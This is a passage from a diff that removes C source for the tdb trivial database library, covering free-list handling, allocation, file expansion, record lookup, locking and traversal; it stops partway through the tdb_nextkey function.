-static tdb_off tdb_dump_record(TDB_CONTEXT *tdb, tdb_off offset)
-{
-       struct list_struct rec;
-       tdb_off tailer_ofs, tailer;
-
-       if (tdb_read(tdb, offset, (char *)&rec, sizeof(rec), DOCONV()) == -1) {
-               printf("ERROR: failed to read record at %u\n", offset);
-               return 0;
-       }
-
-       printf(" rec: offset=0x%08x next=0x%08x rec_len=%d key_len=%d 
data_len=%d full_hash=0x%x magic=0x%x\n",
-              offset, rec.next, rec.rec_len, rec.key_len, rec.data_len, 
rec.full_hash, rec.magic);
-
-       tailer_ofs = offset + sizeof(rec) + rec.rec_len - sizeof(tdb_off);
-       if (ofs_read(tdb, tailer_ofs, &tailer) == -1) {
-               printf("ERROR: failed to read tailer at %u\n", tailer_ofs);
-               return rec.next;
-       }
-
-       if (tailer != rec.rec_len + sizeof(rec)) {
-               printf("ERROR: tailer does not match record! tailer=%u 
totalsize=%u\n",
-                               (unsigned int)tailer, (unsigned 
int)(rec.rec_len + sizeof(rec)));
-       }
-       return rec.next;
-}
-
-static int tdb_dump_chain(TDB_CONTEXT *tdb, int i)
-{
-       tdb_off rec_ptr, top;
-
-       top = TDB_HASH_TOP(i);
-
-       if (tdb_lock(tdb, i, F_WRLCK) != 0)
-               return -1;
-
-       if (ofs_read(tdb, top, &rec_ptr) == -1)
-               return tdb_unlock(tdb, i, F_WRLCK);
-
-       if (rec_ptr)
-               printf("hash=%d\n", i);
-
-       while (rec_ptr) {
-               rec_ptr = tdb_dump_record(tdb, rec_ptr);
-       }
-
-       return tdb_unlock(tdb, i, F_WRLCK);
-}
-
-void tdb_dump_all(TDB_CONTEXT *tdb)
-{
-       unsigned int i;
-       for (i=0;i<tdb->header.hash_size;i++) {
-               tdb_dump_chain(tdb, i);
-       }
-       printf("freelist:\n");
-       tdb_dump_chain(tdb, -1);
-}
-
-int tdb_printfreelist(TDB_CONTEXT *tdb)
-{
-       int ret;
-       long total_free = 0;
-       tdb_off offset, rec_ptr;
-       struct list_struct rec;
-
-       if ((ret = tdb_lock(tdb, -1, F_WRLCK)) != 0)
-               return ret;
-
-       offset = FREELIST_TOP;
-
-       /* read in the freelist top */
-       if (ofs_read(tdb, offset, &rec_ptr) == -1) {
-               tdb_unlock(tdb, -1, F_WRLCK);
-               return 0;
-       }
-
-       printf("freelist top=[0x%08x]\n", rec_ptr );
-       while (rec_ptr) {
-               if (tdb_read(tdb, rec_ptr, (char *)&rec, sizeof(rec), DOCONV()) 
== -1) {
-                       tdb_unlock(tdb, -1, F_WRLCK);
-                       return -1;
-               }
-
-               if (rec.magic != TDB_FREE_MAGIC) {
-                       printf("bad magic 0x%08x in free list\n", rec.magic);
-                       tdb_unlock(tdb, -1, F_WRLCK);
-                       return -1;
-               }
-
-               printf("entry offset=[0x%08x], rec.rec_len = [0x%08x (%d)] (end 
= 0x%08x)\n", 
-                      rec_ptr, rec.rec_len, rec.rec_len, rec_ptr + 
rec.rec_len);
-               total_free += rec.rec_len;
-
-               /* move to the next record */
-               rec_ptr = rec.next;
-       }
-       printf("total rec_len = [0x%08x (%d)]\n", (int)total_free, 
-               (int)total_free);
-
-       return tdb_unlock(tdb, -1, F_WRLCK);
-}
-
-/* Remove an element from the freelist.  Must have alloc lock. */
-static int remove_from_freelist(TDB_CONTEXT *tdb, tdb_off off, tdb_off next)
-{
-       tdb_off last_ptr, i;
-
-       /* read in the freelist top */
-       last_ptr = FREELIST_TOP;
-       while (ofs_read(tdb, last_ptr, &i) != -1 && i != 0) {
-               if (i == off) {
-                       /* We've found it! */
-                       return ofs_write(tdb, last_ptr, &next);
-               }
-               /* Follow chain (next offset is at start of record) */
-               last_ptr = i;
-       }
-       TDB_LOG((tdb, 0,"remove_from_freelist: not on list at off=%d\n", off));
-       return TDB_ERRCODE(TDB_ERR_CORRUPT, -1);
-}
-
-/* Add an element into the freelist. Merge adjacent records if
-   neccessary. */
-static int tdb_free(TDB_CONTEXT *tdb, tdb_off offset, struct list_struct *rec)
-{
-       tdb_off right, left;
-
-       /* Allocation and tailer lock */
-       if (tdb_lock(tdb, -1, F_WRLCK) != 0)
-               return -1;
-
-       /* set an initial tailer, so if we fail we don't leave a bogus record */
-       if (update_tailer(tdb, offset, rec) != 0) {
-               TDB_LOG((tdb, 0, "tdb_free: upfate_tailer failed!\n"));
-               goto fail;
-       }
-
-       /* Look right first (I'm an Australian, dammit) */
-       right = offset + sizeof(*rec) + rec->rec_len;
-       if (right + sizeof(*rec) <= tdb->map_size) {
-               struct list_struct r;
-
-               if (tdb_read(tdb, right, &r, sizeof(r), DOCONV()) == -1) {
-                       TDB_LOG((tdb, 0, "tdb_free: right read failed at %u\n", 
right));
-                       goto left;
-               }
-
-               /* If it's free, expand to include it. */
-               if (r.magic == TDB_FREE_MAGIC) {
-                       if (remove_from_freelist(tdb, right, r.next) == -1) {
-                               TDB_LOG((tdb, 0, "tdb_free: right free failed 
at %u\n", right));
-                               goto left;
-                       }
-                       rec->rec_len += sizeof(r) + r.rec_len;
-               }
-       }
-
-left:
-       /* Look left */
-       left = offset - sizeof(tdb_off);
-       if (left > TDB_DATA_START(tdb->header.hash_size)) {
-               struct list_struct l;
-               tdb_off leftsize;
-               
-               /* Read in tailer and jump back to header */
-               if (ofs_read(tdb, left, &leftsize) == -1) {
-                       TDB_LOG((tdb, 0, "tdb_free: left offset read failed at 
%u\n", left));
-                       goto update;
-               }
-               left = offset - leftsize;
-
-               /* Now read in record */
-               if (tdb_read(tdb, left, &l, sizeof(l), DOCONV()) == -1) {
-                       TDB_LOG((tdb, 0, "tdb_free: left read failed at %u 
(%u)\n", left, leftsize));
-                       goto update;
-               }
-
-               /* If it's free, expand to include it. */
-               if (l.magic == TDB_FREE_MAGIC) {
-                       if (remove_from_freelist(tdb, left, l.next) == -1) {
-                               TDB_LOG((tdb, 0, "tdb_free: left free failed at 
%u\n", left));
-                               goto update;
-                       } else {
-                               offset = left;
-                               rec->rec_len += leftsize;
-                       }
-               }
-       }
-
-update:
-       if (update_tailer(tdb, offset, rec) == -1) {
-               TDB_LOG((tdb, 0, "tdb_free: update_tailer failed at %u\n", 
offset));
-               goto fail;
-       }
-
-       /* Now, prepend to free list */
-       rec->magic = TDB_FREE_MAGIC;
-
-       if (ofs_read(tdb, FREELIST_TOP, &rec->next) == -1 ||
-           rec_write(tdb, offset, rec) == -1 ||
-           ofs_write(tdb, FREELIST_TOP, &offset) == -1) {
-               TDB_LOG((tdb, 0, "tdb_free record write failed at offset=%d\n", 
offset));
-               goto fail;
-       }
-
-       /* And we're done. */
-       tdb_unlock(tdb, -1, F_WRLCK);
-       return 0;
-
- fail:
-       tdb_unlock(tdb, -1, F_WRLCK);
-       return -1;
-}
-
-
-/* expand a file.  we prefer to use ftruncate, as that is what posix
-  says to use for mmap expansion */
-static int expand_file(TDB_CONTEXT *tdb, tdb_off size, tdb_off addition)
-{
-       char buf[1024];
-#ifdef HAVE_FTRUNCATE_EXTEND
-       if (ftruncate(tdb->fd, size+addition) != 0) {
-               TDB_LOG((tdb, 0, "expand_file ftruncate to %d failed (%s)\n", 
-                          size+addition, strerror(errno)));
-               return -1;
-       }
-#else
-       char b = 0;
-
-#ifdef HAVE_PWRITE
-       if (pwrite(tdb->fd,  &b, 1, (size+addition) - 1) != 1) {
-#else
-       if (lseek(tdb->fd, (size+addition) - 1, SEEK_SET) != 
(off_t)(size+addition) - 1 || 
-           write(tdb->fd, &b, 1) != 1) {
-#endif
-               TDB_LOG((tdb, 0, "expand_file to %d failed (%s)\n", 
-                          size+addition, strerror(errno)));
-               return -1;
-       }
-#endif
-
-       /* now fill the file with something. This ensures that the file isn't 
sparse, which would be
-          very bad if we ran out of disk. This must be done with write, not 
via mmap */
-       memset(buf, 0x42, sizeof(buf));
-       while (addition) {
-               int n = addition>sizeof(buf)?sizeof(buf):addition;
-#ifdef HAVE_PWRITE
-               int ret = pwrite(tdb->fd, buf, n, size);
-#else
-               int ret;
-               if (lseek(tdb->fd, size, SEEK_SET) != (off_t)size)
-                       return -1;
-               ret = write(tdb->fd, buf, n);
-#endif
-               if (ret != n) {
-                       TDB_LOG((tdb, 0, "expand_file write of %d failed 
(%s)\n", 
-                                  n, strerror(errno)));
-                       return -1;
-               }
-               addition -= n;
-               size += n;
-       }
-       return 0;
-}
-
-
-/* expand the database at least size bytes by expanding the underlying
-   file and doing the mmap again if necessary */
-static int tdb_expand(TDB_CONTEXT *tdb, tdb_off size)
-{
-       struct list_struct rec;
-       tdb_off offset;
-
-       if (tdb_lock(tdb, -1, F_WRLCK) == -1) {
-               TDB_LOG((tdb, 0, "lock failed in tdb_expand\n"));
-               return -1;
-       }
-
-       /* must know about any previous expansions by another process */
-       tdb_oob(tdb, tdb->map_size + 1, 1);
-
-       /* always make room for at least 10 more records, and round
-           the database up to a multiple of TDB_PAGE_SIZE */
-       size = TDB_ALIGN(tdb->map_size + size*10, TDB_PAGE_SIZE) - 
tdb->map_size;
-
-       if (!(tdb->flags & TDB_INTERNAL))
-               tdb_munmap(tdb);
-
-       /*
-        * We must ensure the file is unmapped before doing this
-        * to ensure consistency with systems like OpenBSD where
-        * writes and mmaps are not consistent.
-        */
-
-       /* expand the file itself */
-       if (!(tdb->flags & TDB_INTERNAL)) {
-               if (expand_file(tdb, tdb->map_size, size) != 0)
-                       goto fail;
-       }
-
-       tdb->map_size += size;
-
-       if (tdb->flags & TDB_INTERNAL) {
-               char *new_map_ptr = talloc_realloc_size(tdb, tdb->map_ptr,
-                                                       tdb->map_size);
-               if (!new_map_ptr) {
-                       tdb->map_size -= size;
-                       goto fail;
-               }
-               tdb->map_ptr = new_map_ptr;
-       } else {
-               /*
-                * We must ensure the file is remapped before adding the space
-                * to ensure consistency with systems like OpenBSD where
-                * writes and mmaps are not consistent.
-                */
-
-               /* We're ok if the mmap fails as we'll fallback to read/write */
-               tdb_mmap(tdb);
-       }
-
-       /* form a new freelist record */
-       memset(&rec,'\0',sizeof(rec));
-       rec.rec_len = size - sizeof(rec);
-
-       /* link it into the free list */
-       offset = tdb->map_size - size;
-       if (tdb_free(tdb, offset, &rec) == -1)
-               goto fail;
-
-       tdb_unlock(tdb, -1, F_WRLCK);
-       return 0;
- fail:
-       tdb_unlock(tdb, -1, F_WRLCK);
-       return -1;
-}
-
-
-/* 
-   the core of tdb_allocate - called when we have decided which
-   free list entry to use
- */
-static tdb_off tdb_allocate_ofs(TDB_CONTEXT *tdb, tdb_len length, tdb_off 
rec_ptr,
-                               struct list_struct *rec, tdb_off last_ptr)
-{
-       struct list_struct newrec;
-       tdb_off newrec_ptr;
-
-       memset(&newrec, '\0', sizeof(newrec));
-
-       /* found it - now possibly split it up  */
-       if (rec->rec_len > length + MIN_REC_SIZE) {
-               /* Length of left piece */
-               length = TDB_ALIGN(length, TDB_ALIGNMENT);
-               
-               /* Right piece to go on free list */
-               newrec.rec_len = rec->rec_len - (sizeof(*rec) + length);
-               newrec_ptr = rec_ptr + sizeof(*rec) + length;
-               
-               /* And left record is shortened */
-               rec->rec_len = length;
-       } else {
-               newrec_ptr = 0;
-       }
-       
-       /* Remove allocated record from the free list */
-       if (ofs_write(tdb, last_ptr, &rec->next) == -1) {
-               return 0;
-       }
-       
-       /* Update header: do this before we drop alloc
-          lock, otherwise tdb_free() might try to
-          merge with us, thinking we're free.
-          (Thanks Jeremy Allison). */
-       rec->magic = TDB_MAGIC;
-       if (rec_write(tdb, rec_ptr, rec) == -1) {
-               return 0;
-       }
-       
-       /* Did we create new block? */
-       if (newrec_ptr) {
-               /* Update allocated record tailer (we
-                  shortened it). */
-               if (update_tailer(tdb, rec_ptr, rec) == -1) {
-                       return 0;
-               }
-               
-               /* Free new record */
-               if (tdb_free(tdb, newrec_ptr, &newrec) == -1) {
-                       return 0;
-               }
-       }
-       
-       /* all done - return the new record offset */
-       return rec_ptr;
-}
-
-/* allocate some space from the free list. The offset returned points
-   to a unconnected list_struct within the database with room for at
-   least length bytes of total data
-
-   0 is returned if the space could not be allocated
- */
-static tdb_off tdb_allocate(TDB_CONTEXT *tdb, tdb_len length,
-                           struct list_struct *rec)
-{
-       tdb_off rec_ptr, last_ptr, newrec_ptr;
-       struct {
-               tdb_off rec_ptr, last_ptr;
-               tdb_len rec_len;
-       } bestfit = { 0, 0, 0 };
-
-       if (tdb_lock(tdb, -1, F_WRLCK) == -1)
-               return 0;
-
-       /* Extra bytes required for tailer */
-       length += sizeof(tdb_off);
-
- again:
-       last_ptr = FREELIST_TOP;
-
-       /* read in the freelist top */
-       if (ofs_read(tdb, FREELIST_TOP, &rec_ptr) == -1)
-               goto fail;
-
-       bestfit.rec_ptr = 0;
-
-       /* 
-          this is a best fit allocation strategy. Originally we used
-          a first fit strategy, but it suffered from massive fragmentation
-          issues when faced with a slowly increasing record size.
-        */
-       while (rec_ptr) {
-               if (rec_free_read(tdb, rec_ptr, rec) == -1) {
-                       goto fail;
-               }
-
-               if (rec->rec_len >= length) {
-                       if (bestfit.rec_ptr == 0 ||
-                           rec->rec_len < bestfit.rec_len) {
-                               bestfit.rec_len = rec->rec_len;
-                               bestfit.rec_ptr = rec_ptr;
-                               bestfit.last_ptr = last_ptr;
-                               /* consider a fit to be good enough if we 
aren't wasting more than half the space */
-                               if (bestfit.rec_len < 2*length) {
-                                       break;
-                               }
-                       }
-               }
-
-               /* move to the next record */
-               last_ptr = rec_ptr;
-               rec_ptr = rec->next;
-       }
-
-       if (bestfit.rec_ptr != 0) {
-               if (rec_free_read(tdb, bestfit.rec_ptr, rec) == -1) {
-                       goto fail;
-               }
-
-               newrec_ptr = tdb_allocate_ofs(tdb, length, bestfit.rec_ptr, 
rec, bestfit.last_ptr);
-               tdb_unlock(tdb, -1, F_WRLCK);
-               return newrec_ptr;
-       }
-
-       /* we didn't find enough space. See if we can expand the
-          database and if we can then try again */
-       if (tdb_expand(tdb, length + sizeof(*rec)) == 0)
-               goto again;
- fail:
-       tdb_unlock(tdb, -1, F_WRLCK);
-       return 0;
-}
-
-/* initialise a new database with a specified hash size */
-static int tdb_new_database(TDB_CONTEXT *tdb, int hash_size)
-{
-       struct tdb_header *newdb;
-       int size, ret = -1;
-
-       /* We make it up in memory, then write it out if not internal */
-       size = sizeof(struct tdb_header) + (hash_size+1)*sizeof(tdb_off);
-       if (!(newdb = talloc_zero_size(tdb, size)))
-               return TDB_ERRCODE(TDB_ERR_OOM, -1);
-
-       /* Fill in the header */
-       newdb->version = TDB_VERSION;
-       newdb->hash_size = hash_size;
-       if (tdb->flags & TDB_INTERNAL) {
-               tdb->map_size = size;
-               tdb->map_ptr = (char *)newdb;
-               memcpy(&tdb->header, newdb, sizeof(tdb->header));
-               /* Convert the `ondisk' version if asked. */
-               CONVERT(*newdb);
-               return 0;
-       }
-       if (lseek(tdb->fd, 0, SEEK_SET) == -1)
-               goto fail;
-
-       if (ftruncate(tdb->fd, 0) == -1)
-               goto fail;
-
-       /* This creates an endian-converted header, as if read from disk */
-       CONVERT(*newdb);
-       memcpy(&tdb->header, newdb, sizeof(tdb->header));
-       /* Don't endian-convert the magic food! */
-       memcpy(newdb->magic_food, TDB_MAGIC_FOOD, strlen(TDB_MAGIC_FOOD)+1);
-       if (write(tdb->fd, newdb, size) != size)
-               ret = -1;
-       else
-               ret = 0;
-
-  fail:
-       SAFE_FREE(newdb);
-       return ret;
-}
-
-/* Returns 0 on fail.  On success, return offset of record, and fills
-   in rec */
-static tdb_off tdb_find(TDB_CONTEXT *tdb, TDB_DATA key, uint32_t hash,
-                       struct list_struct *r)
-{
-       tdb_off rec_ptr;
-       
-       /* read in the hash top */
-       if (ofs_read(tdb, TDB_HASH_TOP(hash), &rec_ptr) == -1)
-               return 0;
-
-       /* keep looking until we find the right record */
-       while (rec_ptr) {
-               if (rec_read(tdb, rec_ptr, r) == -1)
-                       return 0;
-
-               if (!TDB_DEAD(r) && hash==r->full_hash && 
key.dsize==r->key_len) {
-                       /* a very likely hit - read the key */
-                       int cmp = tdb_key_eq(tdb, rec_ptr + sizeof(*r), key);
-                       if (cmp < 0)
-                               return 0;
-                       else if (cmp > 0)
-                               return rec_ptr;
-               }
-               rec_ptr = r->next;
-       }
-       return TDB_ERRCODE(TDB_ERR_NOEXIST, 0);
-}
-
-/* As tdb_find, but if you succeed, keep the lock */
-static tdb_off tdb_find_lock_hash(TDB_CONTEXT *tdb, TDB_DATA key, uint32_t 
hash, int locktype,
-                            struct list_struct *rec)
-{
-       uint32_t rec_ptr;
-
-       if (tdb_lock(tdb, BUCKET(hash), locktype) == -1)
-               return 0;
-       if (!(rec_ptr = tdb_find(tdb, key, hash, rec)))
-               tdb_unlock(tdb, BUCKET(hash), locktype);
-       return rec_ptr;
-}
-
-enum TDB_ERROR tdb_error(TDB_CONTEXT *tdb)
-{
-       return tdb->ecode;
-}
-
-static struct tdb_errname {
-       enum TDB_ERROR ecode; const char *estring;
-} emap[] = { {TDB_SUCCESS, "Success"},
-            {TDB_ERR_CORRUPT, "Corrupt database"},
-            {TDB_ERR_IO, "IO Error"},
-            {TDB_ERR_LOCK, "Locking error"},
-            {TDB_ERR_OOM, "Out of memory"},
-            {TDB_ERR_EXISTS, "Record exists"},
-            {TDB_ERR_NOLOCK, "Lock exists on other keys"},
-            {TDB_ERR_NOEXIST, "Record does not exist"} };
-
-/* Error string for the last tdb error */
-const char *tdb_errorstr(TDB_CONTEXT *tdb)
-{
-       uint32_t i;
-       for (i = 0; i < sizeof(emap) / sizeof(struct tdb_errname); i++)
-               if (tdb->ecode == emap[i].ecode)
-                       return emap[i].estring;
-       return "Invalid error code";
-}
-
-/* update an entry in place - this only works if the new data size
-   is <= the old data size and the key exists.
-   on failure return -1.
-*/
-
-static int tdb_update_hash(TDB_CONTEXT *tdb, TDB_DATA key, uint32_t hash, 
TDB_DATA dbuf)
-{
-       struct list_struct rec;
-       tdb_off rec_ptr;
-
-       /* find entry */
-       if (!(rec_ptr = tdb_find(tdb, key, hash, &rec)))
-               return -1;
-
-       /* must be long enough key, data and tailer */
-       if (rec.rec_len < key.dsize + dbuf.dsize + sizeof(tdb_off)) {
-               tdb->ecode = TDB_SUCCESS; /* Not really an error */
-               return -1;
-       }
-
-       if (tdb_write(tdb, rec_ptr + sizeof(rec) + rec.key_len,
-                     dbuf.dptr, dbuf.dsize) == -1)
-               return -1;
-
-       if (dbuf.dsize != rec.data_len) {
-               /* update size */
-               rec.data_len = dbuf.dsize;
-               return rec_write(tdb, rec_ptr, &rec);
-       }
- 
-       return 0;
-}
-
-/* find an entry in the database given a key */
-/* If an entry doesn't exist tdb_err will be set to
- * TDB_ERR_NOEXIST. If a key has no data attached
- * then the TDB_DATA will have zero length but
- * a non-zero pointer
- */
-
-TDB_DATA tdb_fetch(TDB_CONTEXT *tdb, TDB_DATA key)
-{
-       tdb_off rec_ptr;
-       struct list_struct rec;
-       TDB_DATA ret;
-       uint32_t hash;
-
-       /* find which hash bucket it is in */
-       hash = tdb->hash_fn(&key);
-       if (!(rec_ptr = tdb_find_lock_hash(tdb,key,hash,F_RDLCK,&rec)))
-               return tdb_null;
-
-       ret.dptr = tdb_alloc_read(tdb, rec_ptr + sizeof(rec) + rec.key_len,
-                                 rec.data_len);
-       ret.dsize = rec.data_len;
-       tdb_unlock(tdb, BUCKET(rec.full_hash), F_RDLCK);
-       return ret;
-}
-
-/* check if an entry in the database exists 
-
-   note that 1 is returned if the key is found and 0 is returned if not found
-   this doesn't match the conventions in the rest of this module, but is
-   compatible with gdbm
-*/
-static int tdb_exists_hash(TDB_CONTEXT *tdb, TDB_DATA key, uint32_t hash)
-{
-       struct list_struct rec;
-       
-       if (tdb_find_lock_hash(tdb, key, hash, F_RDLCK, &rec) == 0)
-               return 0;
-       tdb_unlock(tdb, BUCKET(rec.full_hash), F_RDLCK);
-       return 1;
-}
-
-int tdb_exists(TDB_CONTEXT *tdb, TDB_DATA key)
-{
-       uint32_t hash = tdb->hash_fn(&key);
-       return tdb_exists_hash(tdb, key, hash);
-}
-
-/* record lock stops delete underneath */
-static int lock_record(TDB_CONTEXT *tdb, tdb_off off)
-{
-       return off ? tdb_brlock(tdb, off, F_RDLCK, F_SETLKW, 0) : 0;
-}
-/*
-  Write locks override our own fcntl readlocks, so check it here.
-  Note this is meant to be F_SETLK, *not* F_SETLKW, as it's not
-  an error to fail to get the lock here.
-*/
- 
-static int write_lock_record(TDB_CONTEXT *tdb, tdb_off off)
-{
-       struct tdb_traverse_lock *i;
-       for (i = &tdb->travlocks; i; i = i->next)
-               if (i->off == off)
-                       return -1;
-       return tdb_brlock(tdb, off, F_WRLCK, F_SETLK, 1);
-}
-
-/*
-  Note this is meant to be F_SETLK, *not* F_SETLKW, as it's not
-  an error to fail to get the lock here.
-*/
-
-static int write_unlock_record(TDB_CONTEXT *tdb, tdb_off off)
-{
-       return tdb_brlock(tdb, off, F_UNLCK, F_SETLK, 0);
-}
-/* fcntl locks don't stack: avoid unlocking someone else's */
-static int unlock_record(TDB_CONTEXT *tdb, tdb_off off)
-{
-       struct tdb_traverse_lock *i;
-       uint32_t count = 0;
-
-       if (off == 0)
-               return 0;
-       for (i = &tdb->travlocks; i; i = i->next)
-               if (i->off == off)
-                       count++;
-       return (count == 1 ? tdb_brlock(tdb, off, F_UNLCK, F_SETLKW, 0) : 0);
-}
-
-/* actually delete an entry in the database given the offset */
-static int do_delete(TDB_CONTEXT *tdb, tdb_off rec_ptr, struct list_struct*rec)
-{
-       tdb_off last_ptr, i;
-       struct list_struct lastrec;
-
-       if (tdb->read_only) return -1;
-
-       if (write_lock_record(tdb, rec_ptr) == -1) {
-               /* Someone traversing here: mark it as dead */
-               rec->magic = TDB_DEAD_MAGIC;
-               return rec_write(tdb, rec_ptr, rec);
-       }
-       if (write_unlock_record(tdb, rec_ptr) != 0)
-               return -1;
-
-       /* find previous record in hash chain */
-       if (ofs_read(tdb, TDB_HASH_TOP(rec->full_hash), &i) == -1)
-               return -1;
-       for (last_ptr = 0; i != rec_ptr; last_ptr = i, i = lastrec.next)
-               if (rec_read(tdb, i, &lastrec) == -1)
-                       return -1;
-
-       /* unlink it: next ptr is at start of record. */
-       if (last_ptr == 0)
-               last_ptr = TDB_HASH_TOP(rec->full_hash);
-       if (ofs_write(tdb, last_ptr, &rec->next) == -1)
-               return -1;
-
-       /* recover the space */
-       if (tdb_free(tdb, rec_ptr, rec) == -1)
-               return -1;
-       return 0;
-}
-
-/* Uses traverse lock: 0 = finish, -1 = error, other = record offset */
-static int tdb_next_lock(TDB_CONTEXT *tdb, struct tdb_traverse_lock *tlock,
-                        struct list_struct *rec)
-{
-       int want_next = (tlock->off != 0);
-
-       /* Lock each chain from the start one. */
-       for (; tlock->hash < tdb->header.hash_size; tlock->hash++) {
-
-               /* this is an optimisation for the common case where
-                  the hash chain is empty, which is particularly
-                  common for the use of tdb with ldb, where large
-                  hashes are used. In that case we spend most of our
-                  time in tdb_brlock(), locking empty hash chains.
-
-                  To avoid this, we do an unlocked pre-check to see
-                  if the hash chain is empty before starting to look
-                  inside it. If it is empty then we can avoid that
-                  hash chain. If it isn't empty then we can't believe
-                  the value we get back, as we read it without a
-                  lock, so instead we get the lock and re-fetch the
-                  value below.
-
-                  Notice that not doing this optimisation on the
-                  first hash chain is critical. We must guarantee
-                  that we have done at least one fcntl lock at the
-                  start of a search to guarantee that memory is
-                  coherent on SMP systems. If records are added by
-                  others during the search then thats OK, and we
-                  could possibly miss those with this trick, but we
-                  could miss them anyway without this trick, so the
-                  semantics don't change.
-
-                  With a non-indexed ldb search this trick gains us a
-                  factor of around 80 in speed on a linux 2.6.x
-                  system (testing using ldbtest).
-                */
-               if (!tlock->off && tlock->hash != 0) {
-                       uint32_t off;
-                       if (tdb->map_ptr) {
-                               for (;tlock->hash < 
tdb->header.hash_size;tlock->hash++) {
-                                       if (0 != *(uint32_t 
*)(TDB_HASH_TOP(tlock->hash) + (unsigned char *)tdb->map_ptr)) {
-                                               break;
-                                       }
-                               }
-                               if (tlock->hash == tdb->header.hash_size) {
-                                       continue;
-                               }
-                       } else {
-                               if (ofs_read(tdb, TDB_HASH_TOP(tlock->hash), 
&off) == 0 &&
-                                   off == 0) {
-                                       continue;
-                               }
-                       }
-               }
-
-               if (tdb_lock(tdb, tlock->hash, F_WRLCK) == -1)
-                       return -1;
-
-               /* No previous record?  Start at top of chain. */
-               if (!tlock->off) {
-                       if (ofs_read(tdb, TDB_HASH_TOP(tlock->hash),
-                                    &tlock->off) == -1)
-                               goto fail;
-               } else {
-                       /* Otherwise unlock the previous record. */
-                       if (unlock_record(tdb, tlock->off) != 0)
-                               goto fail;
-               }
-
-               if (want_next) {
-                       /* We have offset of old record: grab next */
-                       if (rec_read(tdb, tlock->off, rec) == -1)
-                               goto fail;
-                       tlock->off = rec->next;
-               }
-
-               /* Iterate through chain */
-               while( tlock->off) {
-                       tdb_off current;
-                       if (rec_read(tdb, tlock->off, rec) == -1)
-                               goto fail;
-
-                       /* Detect infinite loops. From "Shlomi Yaakobovich" 
<Shlomi@xxxxxxxxxx>. */
-                       if (tlock->off == rec->next) {
-                               TDB_LOG((tdb, 0, "tdb_next_lock: loop 
detected.\n"));
-                               goto fail;
-                       }
-
-                       if (!TDB_DEAD(rec)) {
-                               /* Woohoo: we found one! */
-                               if (lock_record(tdb, tlock->off) != 0)
-                                       goto fail;
-                               return tlock->off;
-                       }
-
-                       /* Try to clean dead ones from old traverses */
-                       current = tlock->off;
-                       tlock->off = rec->next;
-                       if (!tdb->read_only && 
-                           do_delete(tdb, current, rec) != 0)
-                               goto fail;
-               }
-               tdb_unlock(tdb, tlock->hash, F_WRLCK);
-               want_next = 0;
-       }
-       /* We finished iteration without finding anything */
-       return TDB_ERRCODE(TDB_SUCCESS, 0);
-
- fail:
-       tlock->off = 0;
-       if (tdb_unlock(tdb, tlock->hash, F_WRLCK) != 0)
-               TDB_LOG((tdb, 0, "tdb_next_lock: On error unlock failed!\n"));
-       return -1;
-}
-
-/* traverse the entire database - calling fn(tdb, key, data) on each element.
-   return -1 on error or the record count traversed
-   if fn is NULL then it is not called
-   a non-zero return value from fn() indicates that the traversal should stop
-  */
-int tdb_traverse(TDB_CONTEXT *tdb, tdb_traverse_func fn, void *private)
-{
-       TDB_DATA key, dbuf;
-       struct list_struct rec;
-       struct tdb_traverse_lock tl = { NULL, 0, 0 };
-       int ret, count = 0;
-
-       /* This was in the initializaton, above, but the IRIX compiler
-        * did not like it.  crh
-        */
-       tl.next = tdb->travlocks.next;
-
-       /* fcntl locks don't stack: beware traverse inside traverse */
-       tdb->travlocks.next = &tl;
-
-       /* tdb_next_lock places locks on the record returned, and its chain */
-       while ((ret = tdb_next_lock(tdb, &tl, &rec)) > 0) {
-               count++;
-               /* now read the full record */
-               key.dptr = tdb_alloc_read(tdb, tl.off + sizeof(rec), 
-                                         rec.key_len + rec.data_len);
-               if (!key.dptr) {
-                       ret = -1;
-                       if (tdb_unlock(tdb, tl.hash, F_WRLCK) != 0)
-                               goto out;
-                       if (unlock_record(tdb, tl.off) != 0)
-                               TDB_LOG((tdb, 0, "tdb_traverse: key.dptr == 
NULL and unlock_record failed!\n"));
-                       goto out;
-               }
-               key.dsize = rec.key_len;
-               dbuf.dptr = key.dptr + rec.key_len;
-               dbuf.dsize = rec.data_len;
-
-               /* Drop chain lock, call out */
-               if (tdb_unlock(tdb, tl.hash, F_WRLCK) != 0) {
-                       ret = -1;
-                       goto out;
-               }
-               if (fn && fn(tdb, key, dbuf, private)) {
-                       /* They want us to terminate traversal */
-                       ret = count;
-                       if (unlock_record(tdb, tl.off) != 0) {
-                               TDB_LOG((tdb, 0, "tdb_traverse: unlock_record 
failed!\n"));;
-                               ret = -1;
-                       }
-                       tdb->travlocks.next = tl.next;
-                       SAFE_FREE(key.dptr);
-                       return count;
-               }
-               SAFE_FREE(key.dptr);
-       }
-out:
-       tdb->travlocks.next = tl.next;
-       if (ret < 0)
-               return -1;
-       else
-               return count;
-}
-
-/* find the first entry in the database and return its key */
-TDB_DATA tdb_firstkey(TDB_CONTEXT *tdb)
-{
-       TDB_DATA key;
-       struct list_struct rec;
-
-       /* release any old lock */
-       if (unlock_record(tdb, tdb->travlocks.off) != 0)
-               return tdb_null;
-       tdb->travlocks.off = tdb->travlocks.hash = 0;
-
-       if (tdb_next_lock(tdb, &tdb->travlocks, &rec) <= 0)
-               return tdb_null;
-       /* now read the key */
-       key.dsize = rec.key_len;
-       key.dptr =tdb_alloc_read(tdb,tdb->travlocks.off+sizeof(rec),key.dsize);
-       if (tdb_unlock(tdb, BUCKET(tdb->travlocks.hash), F_WRLCK) != 0)
-               TDB_LOG((tdb, 0, "tdb_firstkey: error occurred while 
tdb_unlocking!\n"));
-       return key;
-}
-
-/* find the next entry in the database, returning its key */
-TDB_DATA tdb_nextkey(TDB_CONTEXT *tdb, TDB_DATA oldkey)
-{
-       uint32_t oldhash;
-       TDB_DATA key = tdb_null;
-       struct list_struct rec;
-       char *k = NULL;
-
-       /* Is locked key the old key?  If so, traverse will be reliable. */
-       if (tdb->travlocks.off) {
-               if (tdb_lock(tdb,tdb->travlocks.hash,F_WRLCK))
-                       return tdb_null;
-               if (rec_read(tdb, tdb->travlocks.off, &rec) == -1
-                   || !(k = tdb_alloc_read(tdb,tdb->travlocks.off+sizeof(rec),
-                                           rec.key_len))
-                   || memcmp(k, oldkey.dptr, oldkey.dsize) != 0) {
-                       /* No, it wasn't: unlock it and start from scratch */
-                       if (unlock_record(tdb, tdb->travlocks.off) != 0)
-                               return tdb_null;
-                       if (tdb_unlock(tdb, tdb->travlocks.hash, F_WRLCK) != 0)
-                               return tdb_null;
-                       tdb->travlocks.off = 0;
-               }
-
-               SAFE_FREE(k);
-       }
-
-       if (!tdb->travlocks.off) {
